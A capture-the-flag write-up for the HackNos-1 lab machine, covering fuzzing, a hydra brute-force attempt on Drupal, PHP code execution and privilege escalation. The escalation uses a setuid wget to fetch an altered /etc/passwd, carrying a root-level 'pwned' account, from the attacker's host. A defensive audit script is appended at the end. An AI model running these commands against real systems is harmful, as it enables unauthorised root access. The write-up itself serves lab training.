Last updated: 15 Apr 24 09:30:40 (UTC)

Write-Up HackNos-1

HackNos-1

By Lawcky 02/01/2024

Introduction

Flags: 2 (first user, second root)

Learning: exploit | Web Application | Enumeration | Privilege Escalation

Difficulty: easy-medium

Additional info:

Name: hackNos: Os-hackNos
Release date: 27 Nov 2019
Author: Rahul Gehlaut
Series: hackNos

|NOTE| The full scan outputs are not copied here, as they would be far too voluminous; click here to see them.


In this write-up

  • ffuf
  • burp decoder tool
  • nikto
  • nmap
  • php rce
  • SUID for Wget

Write-UP

We fuzz the website for hidden directories:
sudo ffuf -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt:FUZZ -u http://192.168.1.10/FUZZ

[screenshot]

[screenshot]

Let's try to brute-force the Drupal login for the user james:
sudo hydra -l james -P /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt 192.168.1.10 http-post-form '/drupal/:name=^USER^&pass=^PASS^:F=Sorry, unrecognized username or password'

[screenshot]

It cannot be brute-forced, it seems.

Let's fuzz Drupal and run a nikto scan on it:
nikto -h http://192.168.1.10/drupal/
nikto output ===> here
sudo ffuf -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt:FUZZ -u http://192.168.1.10/drupal/FUZZ

http://192.168.1.10/drupal/sites/README.txt
[screenshot]

Lots of code and config files are exposed in drupal/includes.


User Enumeration

===> hacktrix

There are 2 users:

[screenshot]

james and another one.

The version is < 8 and the PHP module is installed.

[screenshot]

After rerunning another ffuf fuzz we find alexander.txt.

[screenshot]

Inside:

[screenshot]

Decoding it we get:

[screenshot]

After some research we find that it is a Brainfuck program; once decoded, the result is:

[screenshot]

[screenshot]


RCE using php modules

Back to ===> hacktrix

[screenshot]

Then we add the PHP code in a page and run it:

[screenshots]

Upgrading to a better TTY:

[screenshots]

First flag found.


Privilege Escalation

Using SUID

find / -perm -4000

[screenshot]

wget has the SUID bit set, which can be abused ===> gtfo

We can create a modified copy of /etc/passwd and overwrite the original with it using the SUID wget.

On my machine:

vim /home/passwd

(copy the target's /etc/passwd into it)

openssl passwd -1

Then create a new user (credentials pwned:pwned):

echo 'pwned:$1$k3gC0LDh$3BmH74WpKupICQLY0CdnD1:0:0:hackingAcc:/root:/bin/bash' >> /home/passwd

python3 -m http.server 8000

On the target:

cd /etc
wget http://192.168.1.253:8000/passwd -O passwd

[screenshot]

[screenshot]

Second flag found.
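As an added defensive check, not part of the original write-up: a small POSIX shell audit that looks for the precondition this privilege escalation relied on (a setuid bit on a file-writing downloader such as wget, generalised here to curl as well) and for what it leaves behind (an extra UID-0 account in /etc/passwd). The sample passwd file and the fake setuid tree are constructed here so the checks run offline.

```shell
#!/bin/sh
# Added defensive audit (not from the original write-up). It looks for the two
# things this privilege escalation depends on or leaves behind:
#   1. a setuid binary that can write arbitrary files (wget on this box), and
#   2. an extra UID-0 entry appended to /etc/passwd.

# Print every account in a passwd file that has UID 0 but is not "root".
rogue_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# List regular files under a directory that carry the setuid bit
# (the same check as `find / -perm -4000`, scoped to one tree).
setuid_files_in() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# Return 0 if a setuid file named wget or curl exists under the directory;
# either one writes to an arbitrary path when it runs as root.
has_setuid_downloader() {
    setuid_files_in "$1" | grep -Eq '/(wget|curl)$'
}

# --- Constructed sample data so the checks run offline ---------------------
SAMPLE_PASSWD=$(mktemp)
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
james:x:1000:1000:james:/home/james:/bin/bash
pwned:$1$PLACEHOLDER$HASH:0:0:hackingAcc:/root:/bin/bash
EOF

SAMPLE_TREE=$(mktemp -d)
mkdir -p "$SAMPLE_TREE/usr/bin"
: > "$SAMPLE_TREE/usr/bin/wget"; chmod u+s "$SAMPLE_TREE/usr/bin/wget"
: > "$SAMPLE_TREE/usr/bin/ls"          # ordinary binary, no setuid bit

# On a real host: rogue_uid0_accounts /etc/passwd ; has_setuid_downloader /
```

Any name printed by rogue_uid0_accounts, or a hit from has_setuid_downloader, is worth an immediate look on a production host.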